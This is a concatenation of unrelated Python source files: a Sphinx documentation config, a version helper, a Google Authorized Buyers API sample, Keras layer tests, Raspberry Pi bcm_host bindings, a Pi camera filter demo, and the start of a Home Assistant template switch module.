copyright = u'2011, Bay Citizen and Texas Tribune'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '12.03.1'
# The full version, including alpha/beta/rc tags.
release = '12.03.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'armstrong'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes', ]

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {
    'index': 'index.html',
}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'ArmstrongPlatformDocumentationdoc'


# -- Options for LaTeX output --------------------------------------------------

# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'

# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'ArmstrongPlatformDocumentation.tex', u'Armstrong Platform Documentation Documentation',
   u'Bay Citizen and Texas Tribune', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Additional stuff for the LaTeX preamble.
#latex_preamble = ''

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'armstrongplatformdocumentation', u'Armstrong Platform Documentation Documentation',
     [u'Bay Citizen and Texas Tribune'], 1)
]


# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = u'Armstrong Platform Documentation'
epub_author = u'Bay Citizen and Texas Tribune'
epub_publisher = u'Bay Citizen and Texas Tribune'
epub_copyright = u'2011, Bay Citizen and Texas Tribune'

# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''

# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''

# A unique identification for the text.
#epub_uid = ''

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []

# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []

# A list of files that should not be packed into the epub file.
#epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3

# Allow duplicate toc entries.
#epub_tocdup = True


# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}

# ormbad.version
# Helper module for ORMBad version information
#
# Author:   Benjamin Bengfort <benjamin@bengfort.com>
# Created:  Thu Aug 13 12:38:42 2015 -0400
#
# Copyright (C) 2015 Tipsy Bear Studios
# For license information, see LICENSE.txt
#
# ID: version.py [] benjamin@bengfort.com $

"""
Helper module for ORMBad version information.
"""

##########################################################################
## Versioning
##########################################################################

__version_info__ = {
    'major': 0,
    'minor': 1,
    'micro': 0,
    'releaselevel': 'final',
    'serial': 0,
}


def get_version(short=False):
    """
    Returns the version from the version info.
    """
    assert __version_info__['releaselevel'] in ('alpha', 'beta', 'final')
    vers = ["%(major)i.%(minor)i" % __version_info__, ]
    if __version_info__['micro']:
        vers.append(".%(micro)i" % __version_info__)
    if __version_info__['releaselevel'] != 'final' and not short:
        vers.append('%s%i' % (__version_info__['releaselevel'][0],
                              __version_info__['serial']))
    return ''.join(vers)

#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""This example creates a bidder-level filter set.

A bidder-level filter set can be used to retrieve aggregated data for all
Authorized Buyers accounts under the given bidder account, including the bidder
account itself.
"""


import argparse
from datetime import date
from datetime import datetime
from datetime import timedelta
import os
import pprint
import sys
import uuid

sys.path.insert(0, os.path.abspath('..'))

from googleapiclient.errors import HttpError
import samples_util


_DATE_FORMAT = '%Y%m%d'
_FILTER_SET_NAME_TEMPLATE = ('bidders/{bidders_resource_id}/'
                             'filterSets/{filtersets_resource_id}')
_OWNER_NAME_TEMPLATE = 'bidders/{bidders_resource_id}'
_TODAY = date.today()
_VALID_ENVIRONMENTS = ('WEB', 'APP')
_VALID_FORMATS = ('DISPLAY', 'VIDEO')
_VALID_PLATFORMS = ('DESKTOP', 'TABLET', 'MOBILE')
_VALID_TIME_SERIES_GRANULARITIES = ('HOURLY', 'DAILY')

DEFAULT_BIDDER_RESOURCE_ID = 'ENTER_BIDDER_RESOURCE_ID_HERE'
DEFAULT_FILTER_SET_RESOURCE_ID = f'FilterSet_{uuid.uuid4()}'
DEFAULT_END_DATE = _TODAY.strftime(_DATE_FORMAT)
DEFAULT_START_DATE = (_TODAY - timedelta(days=7)).strftime(
    _DATE_FORMAT)


def main(ad_exchange_buyer, owner_name, body, is_transient):
  try:
    # Construct and execute the request.
    filter_set = ad_exchange_buyer.bidders().filterSets().create(
        ownerName=owner_name, isTransient=is_transient, body=body).execute()
    print(f'FilterSet created for bidder: "{owner_name}".')
    pprint.pprint(filter_set)
  except HttpError as e:
    print(e)


if __name__ == '__main__':

  def time_series_granularity_type(s):
    if s not in _VALID_TIME_SERIES_GRANULARITIES:
      raise argparse.ArgumentTypeError('Invalid TimeSeriesGranularity '
                                       f'specified: "{s}".')
    return s

  def environment_type(s):
    if s not in _VALID_ENVIRONMENTS:
      raise argparse.ArgumentTypeError(
          f'Invalid Environment specified: "{s}".')
    return s

  def format_type(s):
    if s not in _VALID_FORMATS:
      raise argparse.ArgumentTypeError(f'Invalid Format specified: "{s}".')
    return s

  def platform_type(s):
    if s not in _VALID_PLATFORMS:
      raise argparse.ArgumentTypeError(f'Invalid Platform specified: "{s}".')
    return s

  def valid_date(s):
    try:
      return datetime.strptime(s, _DATE_FORMAT).date()
    except ValueError:
      raise argparse.ArgumentTypeError(f'Invalid date specified: "{s}".')

  parser = argparse.ArgumentParser(
      description=('Creates a bidder-level filter set with the specified '
                   'options.'))
  # Required fields.
  parser.add_argument(
      '-b', '--bidder_resource_id', default=DEFAULT_BIDDER_RESOURCE_ID,
      help=('The resource ID of the bidders resource for which the filter set '
            'is being created. This will be used to construct the ownerName '
            'used as a path parameter for filter set requests. For additional '
            'information on how to configure the ownerName path parameter, '
            'see: https://developers.google.com/authorized-buyers/apis/'
            'reference/rest/v2beta1/bidders.filterSets/create'
            '#body.PATH_PARAMETERS.owner_name'))
  parser.add_argument(
      '-r', '--resource_id', default=DEFAULT_FILTER_SET_RESOURCE_ID,
      help=('The resource ID of the filter set. Note that this must be '
            'unique. This will be used to construct the filter set\'s name. '
            'For additional information on how to configure a filter set\'s '
            'name, see: https://developers.google.com/authorized-buyers/apis/'
            'reference/rest/v2beta1/bidders.filterSets#FilterSet.FIELDS.name'))
  parser.add_argument(
      '--end_date', default=DEFAULT_END_DATE, type=valid_date,
      help=('The end date for the filter set\'s absoluteDateRange field, which '
            'will be accepted in this example in YYYYMMDD format.'))
  parser.add_argument(
      '--start_date', default=DEFAULT_START_DATE, type=valid_date,
      help=('The start date for the filter set\'s time_range field, which '
            'will be accepted in this example in YYYYMMDD format.'))
  # Optional fields.
  parser.add_argument(
      '-e', '--environment', required=False,
      type=environment_type,
      help=('The environment on which to filter.'))
  parser.add_argument(
      '-f', '--format', required=False,
      type=format_type,
      help=('The format on which to filter.'))
  parser.add_argument(
      '-p', '--platforms', required=False, nargs='*', type=platform_type,
      help=('The platforms on which to filter. The filters represented by '
            'multiple platforms are ORed together. Note that you may specify '
            'more than one using a space as a delimiter.'))
  parser.add_argument(
      '-s', '--seller_network_ids', required=False, nargs='*', type=int,
      help=('The list of IDs for seller networks on which to filter. The '
            'filters represented by multiple seller network IDs are ORed '
            'together. Note that you may specify more than one using a space '
            'as a delimiter.'))
  parser.add_argument(
      '-t', '--time_series_granularity', required=False,
      type=time_series_granularity_type,
      help=('The granularity of time intervals if a time series breakdown is '
            'desired.'))
  parser.add_argument(
      '--is_transient', required=False, default=True, type=bool,
      help=('Whether the filter set is transient, or should be persisted '
            'indefinitely. In this example, this will default to True.'))

  args = parser.parse_args()

  # Build the time_range as an AbsoluteDateRange.
  time_range = {
      'startDate': {
          'year': args.start_date.year,
          'month': args.start_date.month,
          'day': args.start_date.day
      },
      'endDate': {
          'year': args.end_date.year,
          'month': args.end_date.month,
          'day': args.end_date.day
      }
  }

  # Create a body containing the required fields.
  BODY = {
      'name': _FILTER_SET_NAME_TEMPLATE.format(
          bidders_resource_id=args.bidder_resource_id,
          filtersets_resource_id=args.resource_id),
      # Note: You may alternatively specify relativeDateRange or
      # realtimeTimeRange.
      'absoluteDateRange': time_range
  }

  # Add optional fields to body if specified.
  if args.environment:
    BODY['environment'] = args.environment
  if args.format:
    BODY['format'] = args.format
  if args.platforms:
    BODY['platforms'] = args.platforms
  if args.seller_network_ids:
    BODY['sellerNetworkIds'] = args.seller_network_ids
  if args.time_series_granularity:
    BODY['timeSeriesGranularity'] = args.time_series_granularity

  try:
    service = samples_util.GetService('v2beta1')
  except IOError as ex:
    print(f'Unable to create adexchangebuyer service - {ex}')
    print('Did you specify the key file in samples_util.py?')
    sys.exit(1)

  main(service, _OWNER_NAME_TEMPLATE.format(
           bidders_resource_id=args.bidder_resource_id),
       BODY, args.is_transient)


# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np

from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test


@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):

  def test_dropout(self):
    testing_utils.layer_test(
        keras.layers.Dropout, kwargs={'rate': 0.5}, input_shape=(3, 2))

    testing_utils.layer_test(
        keras.layers.Dropout,
        kwargs={'rate': 0.5,
                'noise_shape': [3, 1]},
        input_shape=(3, 2))

  def test_dropout_supports_masking(self):
    dropout = keras.layers.Dropout(0.5)
    self.assertEqual(True, dropout.supports_masking)

  def test_spatial_dropout_1d(self):
    testing_utils.layer_test(
        keras.layers.SpatialDropout1D,
        kwargs={'rate': 0.5},
        input_shape=(2, 3, 4))

  def test_spatial_dropout_2d(self):
    testing_utils.layer_test(
        keras.layers.SpatialDropout2D,
        kwargs={'rate': 0.5},
        input_shape=(2, 3, 4, 5))

    testing_utils.layer_test(
        keras.layers.SpatialDropout2D,
        kwargs={'rate': 0.5, 'data_format': 'channels_first'},
        input_shape=(2, 3, 4, 5))

  def test_spatial_dropout_3d(self):
    testing_utils.layer_test(
        keras.layers.SpatialDropout3D,
        kwargs={'rate': 0.5},
        input_shape=(2, 3, 4, 4, 5))

    testing_utils.layer_test(
        keras.layers.SpatialDropout3D,
        kwargs={'rate': 0.5, 'data_format': 'channels_first'},
        input_shape=(2, 3, 4, 4, 5))


@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):

  def test_lambda(self):
    testing_utils.layer_test(
        keras.layers.Lambda,
        kwargs={'function': lambda x: x + 1},
        input_shape=(3, 2))

    testing_utils.layer_test(
        keras.layers.Lambda,
        kwargs={
            'function': lambda x, a, b: x * a + b,
            'arguments': {
                'a': 0.6,
                'b': 0.4
            }
        },
        input_shape=(3, 2))

    # test serialization with function
    def f(x):
      return x + 1

    ld = keras.layers.Lambda(f)
    config = ld.get_config()
    ld = keras.layers.deserialize({
        'class_name': 'Lambda',
        'config': config
    })

    # test with lambda
    ld = keras.layers.Lambda(
        lambda x: keras.backend.concatenate([math_ops.square(x), x]))
    config = ld.get_config()
    ld = keras.layers.Lambda.from_config(config)

  def test_lambda_multiple_inputs(self):
    ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
    x1 = np.ones([3, 2], np.float32)
    x2 = np.ones([3, 5], np.float32)
    out = ld([x1, x2])
    self.assertAllEqual(out.shape, [3, 2])

  def test_lambda_output_shape(self):
    l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
    l(keras.backend.variable(np.ones((1, 1))))
    self.assertEqual((1, 1), l.get_config()['output_shape'])

  def test_lambda_output_shape_function(self):
    def get_output_shape(input_shape):
      return 1 * input_shape

    l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
    l(keras.backend.variable(np.ones((1, 1))))
    self.assertEqual('lambda', l.get_config()['output_shape_type'])

  def test_lambda_output_shape_autocalculate_multiple_inputs(self):

    def lambda_fn(x):
      return math_ops.matmul(x[0], x[1])

    l = keras.layers.Lambda(lambda_fn)
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual((10, 20), output_shape)

  def test_lambda_output_shape_list_multiple_outputs(self):

    def lambda_fn(x):
      return x

    l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual([(10, 10), (10, 20)], output_shape)

  def test_lambda_output_shape_tuple_with_none(self):

    def lambda_fn(x):
      return x

    l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
    output_shape = l.compute_output_shape((5, 10, 20))
    self.assertAllEqual([5, None, 10], output_shape.as_list())

  def test_lambda_output_shape_function_multiple_outputs(self):

    def lambda_fn(x):
      return x

    def output_shape_fn(input_shape):
      return input_shape

    l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
    output_shape = l.compute_output_shape([(10, 10), (10, 20)])
    self.assertAllEqual([(10, 10), (10, 20)], output_shape)

  def test_lambda_config_serialization(self):
    # Test serialization with output_shape and output_shape_type
    layer = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
    layer(keras.backend.variable(np.ones((1, 1))))
    config = layer.get_config()
    layer = keras.layers.deserialize({
        'class_name': 'Lambda',
        'config': config
    })
    layer = keras.layers.Lambda.from_config(config)


@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):

  def test_masking(self):
    testing_utils.layer_test(
        keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))

  def test_keras_mask(self):
    x = np.ones((10, 10))
    y = keras.layers.Masking(1.)(x)
    self.assertTrue(hasattr(y, '_keras_mask'))
    self.assertTrue(y._keras_mask is not None)
    self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))

  def test_activation(self):
    # with string argument
    testing_utils.layer_test(
        keras.layers.Activation,
        kwargs={'activation': 'relu'},
        input_shape=(3, 2))

    # with function argument
    testing_utils.layer_test(
        keras.layers.Activation,
        kwargs={'activation': keras.backend.relu},
        input_shape=(3, 2))

  def test_reshape(self):
    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (8, 1)},
        input_shape=(3, 2, 4))

    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (-1, 1)},
        input_shape=(3, 2, 4))

    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (1, -1)},
        input_shape=(3, 2, 4))

    testing_utils.layer_test(
        keras.layers.Reshape,
        kwargs={'target_shape': (-1, 1)},
        input_shape=(None, None, 2))

  def test_permute(self):
    testing_utils.layer_test(
        keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))

  def test_permute_errors_on_invalid_starting_dims_index(self):
    with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
      testing_utils.layer_test(
          keras.layers.Permute,
          kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))

  def test_permute_errors_on_invalid_set_of_dims_indices(self):
    with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
      testing_utils.layer_test(
          keras.layers.Permute,
          kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))

  def test_flatten(self):
    testing_utils.layer_test(
        keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))

    # Test channels_first
    inputs = np.random.random((10, 3, 5, 5)).astype('float32')
    outputs = testing_utils.layer_test(
        keras.layers.Flatten,
        kwargs={'data_format': 'channels_first'},
        input_data=inputs)
    target_outputs = np.reshape(
        np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
    self.assertAllClose(outputs, target_outputs)

  def test_flatten_scalar_channels(self):
    testing_utils.layer_test(
        keras.layers.Flatten, kwargs={}, input_shape=(3,))

    # Test channels_first
    inputs = np.random.random((10,)).astype('float32')
    outputs = testing_utils.layer_test(
        keras.layers.Flatten,
        kwargs={'data_format': 'channels_first'},
        input_data=inputs)
    target_outputs = np.expand_dims(inputs, -1)
    self.assertAllClose(outputs, target_outputs)

  def test_repeat_vector(self):
    testing_utils.layer_test(
        keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))

  def test_dense(self):
    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))

    testing_utils.layer_test(
        keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))

  def test_dense_dtype(self):
    inputs = ops.convert_to_tensor(
        np.random.randint(low=0, high=7, size=(2, 2)))
    layer = keras.layers.Dense(5, dtype='float32')
    outputs = layer(inputs)
    self.assertEqual(outputs.dtype, 'float32')

  def test_dense_with_policy(self):
    inputs = ops.convert_to_tensor(
        np.random.randint(low=0, high=7, size=(2, 2)), dtype='float16')
    layer = keras.layers.Dense(5, dtype=policy.Policy('infer_float32_vars'))
    outputs = layer(inputs)
    self.assertEqual(outputs.dtype, 'float16')
    self.assertEqual(layer.kernel.dtype, 'float32')

  def test_dense_regularization(self):
    layer = keras.layers.Dense(
        3,
        kernel_regularizer=keras.regularizers.l1(0.01),
        bias_regularizer='l1',
        activity_regularizer='l2',
        name='dense_reg')
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(3, len(layer.losses))

  def test_dense_constraints(self):
    k_constraint = keras.constraints.max_norm(0.01)
    b_constraint = keras.constraints.max_norm(0.01)
    layer = keras.layers.Dense(
        3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(layer.kernel.constraint, k_constraint)
    self.assertEqual(layer.bias.constraint, b_constraint)

  def test_activity_regularization(self):
    layer = keras.layers.ActivityRegularization(l1=0.1)
    layer(keras.backend.variable(np.ones((2, 4))))
    self.assertEqual(1, len(layer.losses))
    config = layer.get_config()
    self.assertEqual(config.pop('l1'), 0.1)

  def test_numpy_inputs(self):
    if context.executing_eagerly():
      layer = keras.layers.RepeatVector(2)
      x = np.ones((10, 10))
      self.assertAllEqual(np.ones((10, 2, 10)), layer(x))

      layer = keras.layers.Concatenate()
      x, y = np.ones((10, 10)), np.ones((10, 10))
      self.assertAllEqual(np.ones((10, 20)), layer([x, y]))


if __name__ == '__main__':
  test.main()

# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013,2014 Dave Hughes <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the
#       names of its contributors may be used to endorse or promote products
#       derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

from __future__ import (
    unicode_literals,
    print_function,
    division,
    absolute_import,
    )

# Make Py2's str equivalent to Py3's
str = type('')

import ctypes as ct
import warnings

_lib = ct.CDLL('libbcm_host.so')

# bcm_host.h #################################################################

bcm_host_init = _lib.bcm_host_init
bcm_host_init.argtypes = []
bcm_host_init.restype = None

bcm_host_deinit = _lib.bcm_host_deinit
bcm_host_deinit.argtypes = []
bcm_host_deinit.restype = None

graphics_get_display_size = _lib.graphics_get_display_size
graphics_get_display_size.argtypes = [ct.c_uint16, ct.POINTER(ct.c_uint32), ct.POINTER(ct.c_uint32)]
graphics_get_display_size.restype = ct.c_int32


# quick demo of some python image filters
# using raspberry pi camera

import Tkinter as tk
from picamera import PiCamera
from time import sleep
from PIL import Image,ImageFilter,ImageChops,ImageTk

imagefile = "image.jpg"
w = 320
h = 240
lastfilter = "none"
camera = PiCamera()

def takephoto():
	camera.capture(imagefile)
	image1 = Image.open(imagefile)
	return image1

def photoloop():
	count = 0
	while (count < 9):
		sleep(0.5)
		image1 =  newphoto()
		if lastfilter is not "none":
			dofilter(lastfilter,image1)
		count = count + 1
		

def newphoto():
   global image1
   image1 =  takephoto()

   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   panel1.image = tkimage1

def invert():
   global image1
   image1= ImageChops.invert(image1)

   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   panel1.image = tkimage1

def grayscale():
   global image1
   r, g, b = image1.split()
   image1 = Image.merge("RGB", (g,g,g))

   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   panel1.image = tkimage1

def dofilter (theimage,thefilter):
   lastfilter = thefilter
   global image1
   image1 =  image1.filter(thefilter)
   tkimage1 = ImageTk.PhotoImage(image1)
   panel1.configure(image=tkimage1)
   panel1.image = tkimage1

# Setup a window
root = tk.Tk()
root.title('Image')

image1 = takephoto()
tkimage1 = ImageTk.PhotoImage(image1)

w = tkimage1.width()
h = tkimage1.height()
root.geometry("%dx%d+%d+%d" % (w, h, 0, 0))

# root has no image argument, so use a label as a panel
panel1 = tk.Label(root, image=tkimage1)
panel1.pack(side='top', fill='both', expand='yes')

# save the panel's image from 'garbage collection'
panel1.image = tkimage1

# Add some buttons
buttonrow = tk.Frame(root)
buttonrow.place(y=0,x=0)

button = tk.Button(buttonrow, text='CAMERA',command = lambda: newphoto())
button.pack(side='left',)
button = tk.Button(buttonrow, text='LOOP',command = lambda: photoloop())
button.pack(side='left',)
button = tk.Button(buttonrow, text='INVERT',command = lambda: invert())
button.pack(side='left',)
button = tk.Button(buttonrow, text='GRAY',command = lambda: grayscale())
button.pack(side='left',)

# add some filter buttons
button = tk.Button(buttonrow, text='BLUR',command = lambda: dofilter(image1,ImageFilter.BLUR))
button.pack(side='left')
button = tk.Button(buttonrow, text='CONTOUR',command = lambda: dofilter(image1,ImageFilter.CONTOUR))
button.pack(side='left')
button = tk.Button(buttonrow, text='FIND_EDGES',command = lambda: dofilter(image1,ImageFilter.FIND_EDGES))
button.pack(side='left')
button = tk.Button(buttonrow, text='EMBOSS',command = lambda: dofilter(image1,ImageFilter.EMBOSS))
button.pack(side='left')
button = tk.Button(buttonrow, text='EDGE_ENHANCE',command = lambda: dofilter(image1,ImageFilter.EDGE_ENHANCE))
button.pack(side='left')
button = tk.Button(buttonrow, text='CLOSE',command = lambda: root.destroy())
button.pack(side='left')

root.mainloop()
"""Support for switches which integrates with other components."""
import logging

import voluptuous as vol

from homeassistant.components.switch import (
    ENTITY_ID_FORMAT,
    PLATFORM_SCHEMA,
    SwitchEntity,
)
from homeassistant.const import (
    ATTR_ENTITY_ID,
    ATTR_FRIENDLY_NAME,
    CONF_ENTITY_PICTURE_TEMPLATE,
    CONF_ICON_TEMPLATE,
    CONF_SWITCHES,
    CONF_UNIQUE_ID,
    CONF_VALUE_TEMPLATE,
    STATE_OFF,
    STATE_ON,
)
from homeassistant.core import callback
from homeassistant.exceptions import TemplateError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.helpers.script import Script

from .const import CONF_AVAILABILITY_TEMPLATE, DOMAIN, PLATFORMS
from .template_entity import TemplateEntity

_LOGGER = logging.getLogger(__name__)
_VALID_STATES = [STATE_ON, STATE_OFF, "true", "false"]

ON_ACTION = "turn_on"
OFF_ACTION = "turn_off"

SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
        vol.Optional(CONF_ICON_TEMPLATE): cv.template,
        vol.Optional(CONF_ENTITY_PICTURE_TEMPLATE): cv.template,
        vol.Optional(CONF_AVAILABILITY_TEMPLATE): cv.template,
        vol.Required(ON_ACTION): cv.SCRIPT_SCHEMA,
        vol.Required(OFF_ACTION): cv.SCRIPT_SCHEMA,
        vol.Optional(ATTR_FRIENDLY_NAME): cv.string,
        vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
        vol.Optional(CONF_UNIQUE_ID): cv.string,
    }
)

PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)


async def _async_create_entities(hass, config):
    """Create the Template switches."""
    switches = []

    for device, device_config in config[CONF_SWITCHES].items():
        friendly_name = device_config.get(ATTR_FRIENDLY_NAME, device)
        state_template = device_config.get(CONF_VALUE_TEMPLATE)
        icon_template = device_config.get(CONF_ICON_TEMPLATE)
        entity_picture_template = device_config.get(CONF_ENTITY_PICTURE_TEMPLATE)
